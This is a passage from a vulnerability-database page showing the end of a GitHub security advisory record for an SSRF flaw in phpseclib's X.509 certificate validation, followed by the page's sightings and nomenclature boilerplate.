egress policy callback similar to existing **setCRLLookupCallback()**; and state plainly in documentation that validating an untrusted certificate can cause outbound requests to URLs found inside that certificate.",
  "id": "GHSA-m557-wrgg-6rp4",
  "modified": "2026-06-16T15:03:58Z",
  "published": "2026-06-16T15:03:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/phpseclib/phpseclib/security/advisories/GHSA-m557-wrgg-6rp4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/phpseclib/phpseclib"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "phpseclib: X.509 certificate validation sends attacker-controlled outbound requests (server-side request forgery) via Authority Information Access"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-55599 (GCVE-0-2026-55599)

FKIE_CVE-2026-55599

GHSA-M557-WRGG-6RP4

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature